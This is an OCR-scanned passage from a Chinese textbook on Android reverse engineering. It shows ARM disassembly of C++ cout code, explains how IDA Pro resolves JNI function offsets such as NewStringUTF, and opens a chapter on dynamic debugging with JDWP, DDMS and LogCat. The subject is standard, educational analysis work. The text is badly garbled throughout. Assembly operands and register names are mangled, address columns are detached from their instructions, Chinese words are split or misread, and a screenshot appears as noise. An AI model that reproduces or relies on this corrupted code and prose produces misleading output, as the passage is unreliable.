traitsIcEERSt13 basic_ostreamIT_ TO_ 
ES6_PKS3_i ; cout 输 出 字符 串 

.text:00008740 LDR RS TRSY 

.text:00008744 LDR R3, [R3,#-0xC] 

.text:00008748 ADD Ran RE RA 

.text:0000874C LDR Re LR3;#0X7GC] 

.text:00008750 CMP R8, #0 ; 判断 返回 的 cout 对 象 是 否 为 空 

.七 exXt :00008754 BEQ throw_badcast 

.text:00008758 LDRB P39. CROWONLG] 

.text:0000875C CMP R3, #0 


.text:00008760 LDRNEB Rl1, [R8,#0x27] 


.text: 
本 
:0000876C 


.text 


.text: 
.text: 
text:: 
“te 
“text:: 
a 
:EE 
.text: 
.text: 
-text: 
text: 
Bh 4 
text: 
ee 
‘让 ext: 
.text: 
:000087A8 


text 


.text: 
texts 
“text: 
‘texts 
DE 
text 
.text: 
text: 
:000087CC 


“Bxt 


.text: 
:000087D4 
Ct: 
.text: 
ext: 
text: 
.text: 
.text: 
.text: 


text 


00008764 
00008768 


00008770 
00008774 
00008778 
0000877C 
00008780 
00008784 
00008788 
00008788 loc_8788 
00008788 
0000878C 
00008790 
00008794 
00008798 
0000879C 
000087A0 
000087A4 


000087AC 
000087B0 
000087B4 
000087B8 
000087BC 
000087C0 
000087C4 
000087C8 


000087D0 


000087D8 
000087DC 
000087E0 
000087E4 
000087E8 
000087EC 
000087F0 


BNE 
MOV 
BL 


MOV 
MOV 
LDR 
MOV 
LDR 
MOV 


LDR 
MOV 
BL 
BL 
MOV 
STR 
MOV 
STRB 
MOV 
MOV 
BL 
MOV 
LDR 
BL 
LDR 
MOV 
LDR 
ADD 
LDR 
CMP 
BEQ 
LDRB 
CMP 
LDRNEB 
BNE 
MOV 
BL 


loc 8788 

RO, R8 
_ZNKStS5ctypeIcEl13 M widen initEv ; 
std: :ctype<char>::_M widen init(void) 
R1, #0xA 


RO, R8 
R3, [R8] 
TR 
PC, [R3,#0x18] 
R1, RO 
; CODE XREF: .text:000087641] 
R8, [R4,R6] 
RO, R8 ; 以 下 两 行为 cout<<endl1 


_ZNSo3putEc ; 
_ZNSo5flushEv ; std::ostream: :flush(void) 
R3, #5 下 党 


std: :ostream: :put (char) 


Ra ER ; a->setM(5) 

R3, #0x61 | et 

R3, [及 7 漠 4] ; a->setC('a') 

R1, #0xA ; a+b=10 

RO, R8 ; R8 为 返回 的 cout 对 象 
_ZNSolsEi ; Cout<<a+b 

RO, R8 

R1, [R7] ; R7 为 aclass 类 的 首 地 址 
_ZNSolsEi ; Cout<<a->getM!() 
RB3, [RO 

R8, RO 

R3, [R3,#-0xC] 

R37 及 RS 

R10, [R3,#0x7C] 

R10, #0 


throw_badcast 
R3, [R10,#0x1C] 
R3, #0 

R1, [R10,#0x27] 
loc_880C 7 
RO, R10 
_ZNKSt5ctypeIcEl3 M widen initEv ;，; 
std: :ctype<char>::_M widen_init(void) 


下 面 两 行为 cout<<end1l 


el 
a > 


.text 
.text 
.text 


.text: 
:text: 
.text: 
stext: 
.text: 
:text:: 


.text 


itext’s 
.text: 
“text: 
Ct 
:texts 


a -> 
-texts 


text 


.text: 
tr 
Stexts 


.text 


.text: 
text: 
text: 
.text: 
.text: 
itexts 
“tt 
“texts 
"tet 
text: 


.text: 
.text: 
.text: 


000087F4 
000087F8 
:000087FC 
:00008800 
:00008804 
00008808 
0000880C 
0000880C loc_880C 
0000880C 
00008810 
00008814 
:00008818 
0000881C 
00008820 
00008824 
00008828 
0000882C 


00008830 
00008834 
:00008838 
0000883C 
00008840 
00008844 
:00008848 
0000884C 
00008850 
00008854 
00008858 
00008858 loc_8858 
00008858 
0000885C 
00008860 
00008864 
00008868 


0000886C 
00008870 
00008874 ， 


MOV 
MOV 
LDR 
MOV 
LDR 
MOV 


MOV 
BL 

BL 

LDR 
LDR 
MOV 
MOV 
ADD 


MOV 
LDMFD 


R1, #0xA 
RO, R10 
R37 ERLA] 
LR, PC 
Per [R37#0xX18] 
R1, RO 
; CODE XREF: .text:000087E81j 
RO, R8 ;下面 两 行为 cout<<end1 
_ZNSo3putEc ; Std: :ostream: :put (char) 
_ZNSo5flushEv ; std::ostream::flush(void) 
R8, [R4,R6] 
R1, =(aDestructorCall - 0x8830) 
R2, #0x12 ; 需要 输出 的 字符 个 数 
RO, R8 
1 Be RI ; "Destructor called." 


_ZSt16 ostream insertIcSstllchar _ 
traitsIcEERSt13 basic ostreamIT 


TO BSE PKS3 1 3 ‘cout 
R3, [R8] 
R3, [R3,#-0xC] 
KS, Ra RS 
R5, [R5,#0x7C] 
R5, #0 
throw badcast 
R3, [RS5,#0x1C] 
R3, #0 
R1, [RS5,#0x27] 
loc_8874 
; CODE XREF: .text:00008894|j 
RO, [R4,R6] 
_ZNSo3putEc ; std::ostream: :put (char) 
_ZNSoS5flushEv ; std::ostream: :flush (void) 
RO, R7 ; R7 为 aclass 类 的 首 地 址 
_ZdlPpv ; cout<<endl 后 delete 删 除 a 
指针 
RO, #0 
SP!，{R4-R10,PC} ; 程序 返回 


这 段 代码 只 是 将 printf 输 出 改 成 了 cout 输 出 ， 但 反 汇编 后 的 代码 阅 读 
起 来 的 难度 就 比 上 一 节 要 高 出 很 多 。 首 先是 STL 库 函数 的 识别 ，IDA Pro 








在 这 方面 非常 出 色 ， 它 识别 出 了 所 有 的 STL 库 函数 ， 虽 然 名 称 比 较 怪 
异 ， 不 过 劳 边 还 是 有 注释 加 以 说 明 ， 上 面 的 代码 笔者 注释 得 比较 清楚 
了 ，aclass 类 访问 的 部 分 与 上 一 节 的 代码 相似 ， 唯 一 难以 理解 的 是 库 函 
数 的 调用 序列 ， 这 方面 的 理解 完全 取决 于 读者 对 STL 代 码 的 理解 程度 ， 
比如 cout<<endl 这 人 句 代 码 在 STL 源 人 码 中 是 这 样 的 : 


template<typename _CharT, typename _Traits> 








inline basic ostream<_CharT, _Traits>& 
endl (basic_ostream<_CharT, _Traits>& _ os) 
{ return flush(. os.put(.__os.widen('‘\n’'))); } 
endl 实 际 上 调用 的 是 std::ostream::put(char) 与 
std::ostream::flush(void)。 因 此 ， 如 果 读 者 事先 知道 这 个 原理 的 话 ， 在 阅 
读 上 面 的 及 汇编 代码 时 就 能 一 眼 找 出 endl 的 所 在 位 置 。 下 面 我 们 来 看 静 
态 链 接 GNU STL 库 的 程序 反 汇 编 代码 。 


E00 有 = 一 -FREE 








.text:0000998C main ; CODE XREF: .text:loc 99 
341j 

.text:0000998C STMFD SP!, {R4-R10,LR} 

.text:00009990 MOV RO, #8 ; 8 字 节 为 aclass 类 的 大 小 

.text:00009994 BL _Znwj ; Operator new(uint) 

.text:00009998 LDR RA4, =(_GLOBAL_OFFSET_TABLE_ - Ox99AC) 

.text:0000999C LDR R6, =0x2BC 

.text:000099A0 LDR R1, =(aConstructorCal - 0x99C0) 

.text:000099A4 ADD RA4, PC, R4 

.text:000099A8 LDR R5, [R4,R6] 

.text:000099AC MOV R7, RO ; aclass *a 

.text:000099B0 MOV R2, #0x13 ; 需要 输出 的 字符 个 数 

.text:000099B4 MOV RO,. RS 

.text:000099B8 ADD Rl PC BL » “Constructor Galled:" 

.text:000099BC BL sub_1AA20 ; cout 输出 变 成 了 子 程序 调用 

.text:000099C0 LDR BR [ES] 

.text:000099C4 LDR R3, [R3,#-0xC] 

.text:000099C8 ADD R37: ‘RS; BR3 

.text:000099CC LDR R8, [R3,#0x7C] 

.text:000099D0 CMP R8, #0 ; 判断 返回 的 cout 对 象 是 否 为 空 

.七 ext :000099D4 BEQ throw_badcast 


.text:000099D8 LDRB R3, [R8,#0x1C] 


.text:00009A08 loc_9A08 ; CODE XREF: .text:000099E41j 


.text:00009A08 LDR R8, [R4,R6] 

.text:00009A0C MOV RO, R8 ; 以 下 两 行为 cout<<end1 

.text:00009A10 BL sub_1A674 ; std::ostream: :put (char) 

.text:00009A14 BL sub_1A4A4 ; Std:; :ostream: :flush{(void) 

.text:00009A18 MOV R3, #5 2 

.text:00009A1C STR R37: [RY] ; a->SetMI(5) 

.text:00009A20 MOV R3, #0x61 六 ”全 三 

.text:00009A24 STRB R3, [RT7,#4] ; a->setC('a') 

.七 exXt :00009A28 MOV R1L， #0xA ; a+b=10 

.text:00009A2C MOV RO, R8 ; R8 为 返回 的 cout 对 象 

.text:00009A30 BL sub_1AA1C ; cout<< 的 代码 也 变 成 子 程序 
调用 了 

.text:00009A34 MOV RO, R8 

.text:00009A38 LDR R1, [R7] ; R7 为 aclass 类 的 首 地 址 

.text:00009A3C BL sub_lAAl1C ; Cout<<a->get™M() 

.text:00009A40 LDR R3, [RO] 

.text:00009A44 MOV R8, RO 

.text:00009A8C loc_9A8C ; CODE XREF: .text:00009A681j 

.text:00009A8C MOV R0，R8 

.text:00009A90 BL sub_1A674 ; std::ostream: :put (char) 

.text:00009A94 BL sub_l1A4A4 ; Std: :ostream: :flush (void) 

.text:00009A98 LDR R8, [R4,R6] 

.text:00009aA9C LDR R1, =(aDestructorCall - 0x9AB0) 

.text:00009AA0 MOV R2, #0x12 ; 需要 输出 的 字符 个 数 

.text:00009AA4 MOV RO, R8 

.text:00009AA8 ADD Rls BE; BH ; "Destructor called." 

.text:00009AAC BL sub_1AA20 ; cout 输 出 变 成 了 子 程序 调用 

.七 ext :00009AD8 loc_9AD8 ; CODE XREF: .text:00009 B14|j 

.text:00009AD8 LDR RO, [R4,R6] 

.text:00009ADC BL sub_1A674 ; std::ostream: :put (char) 

.text:00009AE0 BL sub_l1A4A4 ; std: :ostream: :flush(void) 

.text:00009AE4 MOV RO, R7 

.text:00009AE8 BL 7s an ; Operator delete(void *) 

.text:00009AEC MOV RO, #0 

.text :00009AF0 LDMFD “SP!，{R4-R10,PC} ; 程序 返回 


MOO00OnRd 2 
这 段 反 汇编 代码 中 ， 访 问 aclass 类 的 部 分 与 静态 链接 STL 的 代码 是 一 
样 的 ， 但 访问 STL 库 函数 的 代码 却 变 了 。 每 个 STL 库 函数 的 调用 处 都 变 








成 了 一 条 BL 指 令 ，BL 指 令 调 用 的 子 程序 都 是 相应 STL 函 数 的 实现 代 

码 ，IDA Pro 也 没有 识别 出 它们 ， 这 样 的 话 ， 分 析 静 态 链 接 STL 库 的 程序 
难度 就 很 大 了 ， 除 了 动态 调试 这 些 代 码 ， 笔 者 目前 也 没有 找到 很 好 的 解 
决 方案 。 





7.6 ”Android NDK JNI API 首 向 分 析 


本 小 节 主 要 介绍 Android NDK 通 过 JNI (Java Native Interface) 向 开 
发 人 员 提 供 的 API 函 数 ， 以 及 如 何在 IDA Pro 中 识别 它们 来 进行 下 一 步 的 
分 析 。 





7.6.1 Android NDK 提 供 了 哪些 函数 


开发 过 Linux 平 台 上 C/C++ 程序 的 读者 来 使 用 Android NDK 开 发 原生 
程序 应 该 很 容易 上 手 ， 因 为 在 Linux 平 台 上 使 用 过 的 大 多 数 函 数 在 
Android NDK 中 都 有 提供 ， 它 们 的 声明 全 部 位 于 Android NDK 的 
platforms\<android 版 本 >\arch-armvusminclude 目 录 中 的 头 文件 中 ， 如 大 家 
熟悉 的 stdio.h 文 件 中 就 声明 了 常用 的 输入 输出 函数 。 

除了 直接 在 代码 中 调用 这 些 Linux 平 台 的 原生 函数 外 ，Android NDK 
还 通过 JNI 接 口 回 开发 人 员 提 供 了 一 套 JNI 接 口 函 数 ， 通 过 这 些 函 数 ， 开 
发 人 员 可 以 在 原生 C/C++ 代 码 中 与 Java 代 码 进行 数据 交换 ， 如 通过 
C/C++ 代码 访问 Java 类 的 字段 、 调 用 Java 类 的 方法 等 。 这 项 特性 使 得 开 
发 人 员 使 用 C/C++ 代码 也 能 写 出 功能 强大 的 程序 ， 其 至 可 以 将 大 部 分 的 
Java 代 码 转 移 到 C/C++ 代码 中 来 ， 那 JNI 接 口 都 提供 了 哪些 函数 呢 ? 

Android NDK 的 platforms\<android 版 本 >\arch-arm\usr\include\jni.h 汰 
文件 中 ， 声 明了 所 有 可 以 使 用 到 的 JNI 接 口 函数 。 该 文件 中 有 两 个 重要 
的 结构 体 JNINativeInterface 与 JNIImvokeInterface，JNINativeInterface 是 
JNI 本 地 接口 ， 实 际 上 它 是 一 个 接口 函数 指针 表 ， 里 面 每 一 项 都 为 JNI 接 
口 的 函数 指针 ， 所 有 的 原生 代码 都 可 以 调用 这 些 接口 函数 ， 而 
JNIInvokeInterface 则 是 JNI 调 用 接口 ， 该 结构 目前 只 有 3 个 保留 项 与 5 个 
函数 指针 ， 这 5 个 函数 用 于 访问 全 局 的 JNI 接 口 ， 多 用 于 原生 多 线程 程序 




















开发 。 既 然 JNI 为 开发 人 员 提 供 的 API 就 在 这 两 个 接口 内 ， 那 么 掌握 了 这 
些 API 的 含义 与 使 用 方法 是 不 是 束 可 以 理解 为 掌握 了 Android NDK 开 发 
了 呢 ? 笔 者 认为 大 多 数 时 候 是 这 样 的 。 国 内 目前 没有 一 本 讲解 Android 
NDK 开 发 的 好 书 ， 学 习 这 方面 知识 的 开发 人 员 多 是 通过 Android NDK 提 
供 的 样 例 来 理解 其 使 用 方法 的 ， 就 目前 来 说 ， 在 两 种 情况 下 会 使 用 到 
Android NDK: 第 一 种 是 移植 其 它 平 台 的 C/C++ 库 到 Android 程 序 中 来 ， 
这 类 程序 的 开发 分 为 三 个 阶段 ， 首 先 需 要 完成 代码 的 移植 ， 如 果 代 码 的 
可 移植 性 强 ， 不 涉及 过 多 跨 平 台 问 题 ， 移 植 应 该 是 比较 简单 的 ， 完 成 这 
一 步 后 就 是 原生 代码 与 Java 代 码 的 通信 ， 这 时 就 需要 编写 接口 函数 来 实 
现 了 ， 多 数 情况 下 也 不 是 很 困难 ， 在 接口 函数 中 调用 功能 代码 ， 通 过 
JNI 接 口 返 回 特定 类 型 的 数据 ， 最 后 在 Java 代 人 码 中 调用 这 些 接 口 函 数 即 
可 ; 男 一 种 是 为 了 使 用 原生 代码 而 编写 原生 代码 ， 这 种 情况 多 数 是 为 了 
加 强 代码 保护 ， 防 止 核心 技术 被 破解 ， 因 为 C/C++ 原生 代码 比 传 统 的 
Java 代 码 更 具备 抗 攻 击 能 力 ， 当 然 也 不 排除 Android 开 友人 员 以 前 从 事 过 
C/C++ 开发 工作 ， 使 用 C/C++ 编写 程序 更 顺手 ， 不 过 这 么 较真 的 开发 人 
员 我 想 应 该 是 比较 少见 的 。 

















7.6.2 ”如 何 静 态 分 析 Android NDK 程 序 


静态 分 析 Android NDK 程 序 与 分 析 传 统 的 原生 程序 有 些 不 同 ， 传 统 
的 原生 程序 中 只 调用 了 原生 API 了 水 数 ， 使 用 IDA Pro 分 析 它 们 时 会 被 自动 
识别 出 来 (IDA ”Pro 的 flair 技 术 〉 ， 因 此 分 析 的 难度 转移 到 了 理解 ARM 
指令 集 序 列 的 含义 上 。 而 Android NDK 程 序 使 用 了 JNI 接 口 函数 ， 在 分 析 
它们 时 IDA ”Pro 并 不 能 识别 它们 ， 这 使 得 分 析 工 作 变 得 比较 艰难 。 通 
常 ，Android NDK 程 序 的 反 汇编 代 码 如 下 。 


EXPORT nativeMethod 
nativeMethod 
var_18= -0x18 
var_14= -0x14 


var_C= 


var_4= 


STR 
SUB 
STR 
STR 
LDR 
ADD 
STR 
LDR 
LDR 
LDR 
LDR 
LDR 
BLX 
MOV 
MOV 
ADD 
LDMFD 


-OxC 
-4 


LR, 
SB 
RO, 
Rls 
RS 
R3, 
R3; 
R3, 
RS5 
R3, 
RO, 
R1, 
R3 

R3， 
RO, 
SP, 
SPl, 


[SP,#var_4]! @ 保 存 返 回 地 址 

SP, #0x14 @ 开 辟 栈 空间 
[SP,#0x18+var_14] @ 保 存 第 一 个 参数 
[SP,#0x18+var_18] @ 保 存 第 二 个 参数 
=(aFAxeNativemeth - 0x132C) @ 取 字符 串 仿 移 
PCE, R3 @ "你 好 !NativeMethod" 
[SP,#0x18+var_C] @ 保 存 字 符 串 地 址 


[SP, #0x18+var_14] 


[R3] @ 取 JNIEnv 指 针 *env 
[R3 ,#0x29C] @ 取 (*env) ->NewStringUTF () 地 址 
[SP,#0xl18+var_14] ”@ 第 一 个 参数 


[SP,#0x18+var_C] @ 第 二 个 参数 


@ 调 用 (*env) ->NewStringUTEF () 方 法 
RO @ 返 回 结果 
R3 
SP, #0x14 @ 平 衡 栈 指针 
{PC} @ 子 程序 返回 


上 面 的 反 汇编 代码 在 调用 具体 的 JNI 接 口 函 数 时 ， 函 数 地 址 是 通过 
一 个 基于 宫 存 器 的 偏 移 值 传递 过 来 的 ， 这 个 偏 移 值 是 怎么 计算 的 呢 ? 上 
一 节 讲 过 ，JNI 接 口 函 数 指针 被 放 到 JNINativeInterface 与 
JNIInvokeInterface 两 个 结构 体 里 面 ， 继 续 查 看 jni.h 可 以 发 现 有 如 下 一 段 


声明 。 


#1if defined!(__cplusplus) 
typedef _JNIEnv JNIEnv; 
typedef _JavaVM JavaVM; 
#else 
typedef const struct JNINativeInterface* JNIEnv; 
typedef const struct JNIInvokeInterface* JavaVM:; 

#endif 

如 果 使 用 C++ 代码 来 调用 JNI 接 口 函 数 ，JNIEnv 被 定义 成 了 _JNIEnv 
结构 体 ， 访 结构 体 的 第 一 个 字段 就 是 一 个 JNINativeInterface 结 构 体 的 指 
针 。 如 果 是 C 代 码 调用 JNI 接 口 函 数 ，JNIEnv 则 直接 被 定义 成 
JNINativeInterface 结 构 体 的 指针 。 因 此 ， 可 以 将 JNIEnv 的 首 地 址 解释 成 
JNINativeInterface 的 首 地 址 来 使 用 。 既 然 JNINativeInterface 结 构 中 存放 
的 是 JNI 接 口 函 数 的 地 址 ， 那 么 通过 首 地 址 加 上 索引 值 是 否 就 能 够 找到 
有 具体 的 函数 了 呢 ? 答案 是 肯定 的 。 每 个 地 址 占用 4 字 节 的 空间 ， 上 面 代 
人 码 中 的 0x29C 除 以 4 等 于 167， 有 了 耐心 的 读者 可 以 数 一 数 ， 看 看 
JNINativeInterface 结 构 体 的 第 167 项 是 否 为 NewStringUTF()。 

IDA Pro 文 持 结构 化 的 数据 显示 ， 而 且 文 持 从 C/C++ 头 文件 直接 导入 
结构 体 定 义 。 使 用 方法 是 : 点 击 IDA Pro 菜 单项 “File~Load file ~ Parse c 
header file”， 然 后 选择 jni.h 头 文件 ， 不 过 这 样 直 接 导 入 会 报错 ， 需 要 简 
单 修改 下 jni.jh， 具 体 是 注释 挥 第 27 行 的 “#include<stdarg.h>”， 还 有 将 
1122 行 的 “#define JNIEXPORT _ attribute  ((visibility ("default")))” 改 
成 “#define JNIEXPORT”， 修 改 完成 后 就 可 以 成 功 导入 了 (记得 导入 成 
功 后 将 jni.h 文 件 修改 回去 ， 否 则 ， 编 译 NDK 程 序 时 会 出 错 ) 。 现 在 点 击 
IDA Pro 主 界面 上 的 Structures 选 项 卡 ， 然 后 按 下 Insert 键 打开 “create 
structure/union” 对 话 杠 ， 点 击 界面 上 的 “Add standard structure” 按 钮 ， 在 
打开 的 结构 体 选择 对 话 框 中 选择 JNINativeInterface 并 点 击 OK 返 回 ， 按 照 
上 面 的 操作 把 JNIInvokeInterface 结 构 体 也 导入 进来 。 下 面 回 到 IDA Pro 的 

















反 汇 编 代 码 界面 ， 在 0x29C 所 在 的 代码 行 上 点 击 右 键 ， 会 出 现 如 图 7-19 
所 示 的 菜单 选项 ，IDA ” Pro 成 功 解析 出 了 0x29C 为 JNINativeInterface 的 
NewStringUTFO 函 数 。 


和 IDA Y:\workspace\chapter1\T.6\7.6.2\jninethods\libs\armaeabi\libjnimethods. so 





File Edit Janp Search Yiew Qptions Windows Help 


联 辕 | 名- 叶 - 鬼 向 物 全 | 了 品 国 @: 动 哨 丰 学- 闪 基 Xe 加 口 | 国电 各 


| WW J 2 



































| 因 Panetions window Sx [加 mm erx 回 ex 回 | 回 ©O| Hex View-A 加 Structures [3 国 zams 3 a Inports 回 | 图 Exports 下 
Function name 大 VUar_14= -Bx14 
fF|pthread mutex_unlock | var_C= -OxC 
于 | enu lnwind Find_exidx Var = ~ 
pthread mutex_lock | 
Pthread mutex_init STR LR，[SP ,#uar 4]? 
Fa strlen | SUB SP，SP ，#Bx14 
因 see STR RO, [SP ,#9x18+uar 14] 
月 start STR R1, [SP,#8x18+uar 18] 
nativellethod LDR R3, =(aFAxeNativemeth - Gx132C) 
下 | Java_com_droider_jnimethods_ ADD R3, PC, R3 ;“ 完 闭 YtNativeMethod” 
月 thread_fune STR R3, [SP,#8x18+var_C] 
f| newJniThreads LDR R3, [SP ,#8x18+var 14] 
f| allocNativeBuffer | LDR R3, [R3] 
月 freeNativeBuffer 有 LDR R3, [R3, #8x2003 
| Tar NT | LDR R@, [SP ,#8x1 Group nodes 
Line 17 of 92 | es Ey [SP ,mx Wy Joanp to operand Enter 
感 aph i Hx MOU R3, RG 加 Janp in a new window AttEnter 
HOU R@, R3 be Janp in a new hex window 
ADD SP, SP, #8x1 BY Xrefs fron 
LDMFD Sp?, ¢PCY [a JHINativeInterface NewStrineUTF] 
; End of function na 人 了 tandard symbolic constant 
100.00% (-284,133) (446,217) 00001334 00001334: nativeMethod+24 问 [86] 
剖 ] [Ra, 加 1234] 
(&) Datput window 问 [R3, 加 bl010011100] B Sx 
CSS TilC ULUYLUR IICUTTICULUITINIGLUIGIION VUmU ULVIGUIIGU UG Fi "es i . 而 
Executing function ‘nain',.. | sp 
Compiling file 'C:\Proygram FilesVVSLarc50VAndroidVIDA Demo 6.2\idc\onload,.idc'... Edit function. ,. ttP 
Executing funccion 'OnLoad'... = jide Ctrl+— 
IDA ia analysing the input file... 国 Text view 
You maY start to explore the input file right now. 号 RS 
Propagating type information... 了 
Funccion argunent information has been propagated X Wdafing i! 
The initial autoanalysis has been finished. Synchronize with " v 
IC | Copy address to command line 
Disk: 18GB 


EO 篇 armeabi : cs 篇 include 











图 7-19 ”使 用 IDA Pro 静 态 分 析 Android NDK 程 序 


考虑 到 很 多 读者 对 Android NDK 的 JNI 接 口 函数 不 太 熟 悉 ， 笔 者 为 本 
小 节 编 写 了 jnimethods 实 例 ， 其 中 的 原生 代码 对 JNI 接 口 提 供 的 大 部 分 函 
数 都 有 引用 到 ， 读 者 可 以 结合 该 实例 的 代码 来 逆向 分 析 libjnimethods.so 
人 


7.7 本 章 小 结 


本 章 主 要 介绍 了 Android NDK 生 成 的 原生 程序 的 程序 特点 ， 以 及 如 
何 使 用 IDA ”Pro 来 静态 分 析 它 们 。 分 析 原 生 程 序 的 难度 较 高 ， 除 了 涉及 
本 身 反 汇编 代码 中 众多 的 ARM 指 令 外 ， 还 有 大 量 的 库 函 数 的 反 编 代码 
也 参与 其 中 ， 如 何 区 分 它们 是 提高 分 析 效 率 的 关键 ， 然 而 笔者 无 法 对 其 
一 一 进行 介绍 ， 因 为 这 些 都 需要 分 析 人 员 在 日 积 月 标的 经 验 中 进行 不 断 
的 总 结 。 此 外 ， 有 时 候 反 汇 编 代 码 远 远 比 想象 中 要 复杂 得 多 ， 大 量 的 运 
算 操 作 、 数 据 加 密 、 数 据 解密 等 让 分 析 人 员 很 难 整 理 出 分 析 思 路 ， 这 时 
候 就 需要 使 用 动态 调试 技术 了 ， 这 也 是 我 们 下 一 章 将 要 介绍 的 内 容 。 








第 8 章 ”动态 调试 Android 程 序 


软件 调试 可 分 为 源码 级 调试 与 汇编 级 调试 。 源 码 级 调试 多 用 于 软件 
开发 阶段 ， 开 发 人 员 拥 有 软件 的 源码 ， 可 以 通过 集成 开发 环境 (如 
Android 开 发 使 用 的 Eclipse〉 中 的 调试 器 跟踪 运行 自己 的 软件 ， 解 决 软 
件 中 的 错误 ; 汇编 级 调试 也 就 是 本 章 所 说 的 动态 调试 ， 它 多 用 于 软件 的 
逆 同 工程 ， 分 析 人 员 通 党 没有 软件 的 源 代码 ， 调 试 程序 时 只 能 跟 踩 与 分 
析 汇 编 代码 ， 查 看 寄存 器 的 值 ， 这 些 数据 远 远 没有 源码 级 调试 展示 的 信 
恩 那 么 直观 ， 但 动态 调试 程序 同样 能 够 跟踪 软件 的 执行 流程 ， 反 馈 程序 
执行 时 的 中 间 结 果 ， 在 静态 分 析 程 序 难 以 取得 突破 时 ， 动 态 调试 也 是 一 
种 行 之 有 效 的 逆 同 手段 。 

动态 调试 Android 程 序 分 为 动态 调试 Android ” ”SDK 程序 与 动态 调试 
Android 原 生 程 序 ， 本 章 将 主要 介绍 在 没有 源码 的 情况 下 ， 如 何 使 用 调 
试 器 动态 调试 这 两 种 程序 。 




















8.1 Android 动态 调试 支持 


Android 程 序 的 调试 分 为 Android SDK 开 发 的 “java” 程 序 调试 与 
Android NDK 开 发 的 原生 程序 调试 。“java” 程 序 使 用 Dalvik 虚 拟 机 提供 的 
调试 特性 来 进行 调试 。 

Dalv 这 虚拟 机 的 最 初版 本 承 加 入 了 对 调试 的 文 持 ， 为 了 做 到 与 传统 
Java 代 码 的 调试 接口 统一 ，Dalvik 虚 拟 机 实现 了 JDWP〈Java Debug Wire 
Protocol，Java 调 试 有 线 协议 ) ， 可 以 直接 使 用 文 持 JDWP 协 议 的 调试 器 
来 调试 Android 程 序 ， 如 Java 开 发 人 员 所 熟悉 的 jdb、Ecdlipse、IntelliJ 与 
JSwat。 但 正如 Dalvik 虚 拟 机 的 设计 初衷 那样 ，Dalvik 并 非 为 Java 而 生 ， 

它 是 Android 的 一 部 分 ，Dalvik 并 不 支持 JVMTI (Java _ Virtual Machine 
Tool Interface，Java 虚 拟 机 工具 接口 )。 

Dalvik 虚 拟 机 为 JDWP 的 实现 加 入 了 DDM (Dalvik Debug Monitor， 
Dalvik 调 试 监视 器 ) 特性。 具体 的 实现 有 DDMS (Dalvik Debug Monitor 
Server，Dalvik 调 试 监视 器 服务 ) 与 Eclipse ADT 插 件 。Dalvik 虚 拟 机 中 
所 有 对 调试 支持 的 实现 代码 位 于 Android 系 统 源码 的 dalvik/vm/jdwp 目 录 
下 ， 它 的 实现 在 Dalvik 虚 拟 机 源码 中 是 相对 独立 的 ， 其 中 
dalvik/vm/Debugger.c 建 立 起 了 Dalvik 虚 拟 机 与 DWP 之 间 的 通讯 桥梁 。 
这 么 做 的 好 处 是 便于 在 其 他 项 目 中 复 用 JDWP 的 代码 。 

每 一 个 司 用 调试 的 Dalvik 虚 拟 机 实例 都 会 启动 一 个 JDWP 线 程 ， 该 
线程 一 直 处 于 空 采 状态 ， 直 到 DDMS 或 调试 器 连接 它 ， 该 线程 只 负责 处 
理 调试 器 发 来 的 请 求 ， 而 Dalvik 虚 拟 器 发 起 的 通信 《例如 当 Dalvik 虚 拟 
机 遇 到 断 点 中 断 时 通知 调试 器 ) 都 由 相应 的 线程 发 出 。 

当 Dalvik 虚 拟 机 从 Android 应 用 程序 框架 中 局 动 时 ， 系 统 属性 
ro.debuggable 为 1〈 可 使 用 命令 “adb shell getprop ro.debuggable” 来 检查 
它 ) 时 所 有 的 程序 都 会 开局 调试 文 持 ; 知 为 0， 则 会 判断 程序 的 








AndroidManifest.xml， 如 果 <application> 元 素 中 包含 了 
android:debuggable="true" 则 开局 调试 文 持 。Android AVD 生 成 的 模拟 器 
默认 情况 下 ro.debuggable 被 设置 成 1， 系 统 中 所 有 的 程序 都 是 可 调试 的 。 

原生 程序 则 使 用 传统 的 Linux 程 序 调试 方法 如 GNU 调 试 服务 器 来 连 
接 进 行 调试 。 原 生 程 序 分 为 动态 链接 库 与 普通 可 执行 程序 两 种 。 前 者 大 
多 内 置 于 Android 程 序 中 ， 在 调试 时 需要 先 启 动 Android 程 序 加 载 它 ， 然 
后 使 用 远程 附加 的 方式 来 调试 ， 后 者 则 没有 这 个 限制 ， 可 以 直接 使 用 远 
程 运行 的 方式 来 调试 它 。 








8.2 DDMS 的 使 用 


使 用 DDMS 可 以 监视 Android 程 序 运行 时 的 运行 状态 与 结果 ， 在 动 
态 分 析 Android 程 序 的 过 程 中 ， 合 理 使 用 DDMS 可 以 大 大 提高 分 析 效 


A 
从 
O 


8.2.1 如 何 启动 DDMS 


DDMS 的 全 名 是 Dalvik 虚 拟 机 调试 监控 服务 。 它 提供 了 设备 截屏 、 
查看 运行 的 线程 信息 、 文 件 浏 览 、Logcat、Method Profiling、 广 播 状态 
言 上 号 、 模 拟 电话 呼叫 、 接 收 SMS、 虚 拟 地 理 坐 标 等 功能 。 它 是 Android 
SDK 提 供 的 一 款 工具 。 在 Android SDK 的 tools 目 录 下 ， 有 一 个 ddms.bat 脚 
本 ， 它 就 是 DDMS 的 启动 文件 ， 直 接 双击 该 文件 即 可 启动 DDMS 。 如 果 
安装 了 Eclipse， 并 且 配 置 好 了 Android SDK 与 ADT 插 件 ，DDMS 就 会 集 
成 到 Eclipse 中 ， 可 以 点 击 菜单 项 <Window -Open Perspective DDMS” 打 
开 它 。DDMS 局 动 后 的 界面 如 图 8-1 所 示 。 
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图 8-1 DDMS 启 动 界面 


DDMS 功 能 强大 ， 在 很 多 Android 开 发 书籍 中 都 有 介绍 ， 在 本 章 介 
绍 的 Android 动 态 分 析 技 术 中 ， 它 的 文件 浏览 、 Wi 
Profiling 是 使 用 最 多 的 功能 。 文 件 浏览 可 以 查看 需要 分 析 的 程序 在 安装 
目录 下 生成 的 文件 ， 分 析 这 些 文件 的 内 容 可 以 对 程序 的 设置 及 生成 的 数 
据 有 初步 的 了 解 ，LogCat 则 可 以 输出 软件 运行 时 的 调试 信息 ， 而 Method 
Profiling 用 于 跟踪 程序 的 执行 流程 。 


8.2.2 ”使 用 LogCat 查 看 调试 信息 


Android SDK 提 供 了 android.util.Log 类 来 输出 调试 信息 ， 如 下 面 这 行 
代码 : 











Log.v("com.droider.jnimethods", "jni test a void subclass method, this run 

in java"); 

si util.Log 提 供 了 Log.vO、Log.d0、Log.iO0、Log.wO 以 及 
Log.e() 等 5 个 调试 信息 输出 方法 。 其 中 v 表 示 输 出 VERBOSE 类 型 的 信 
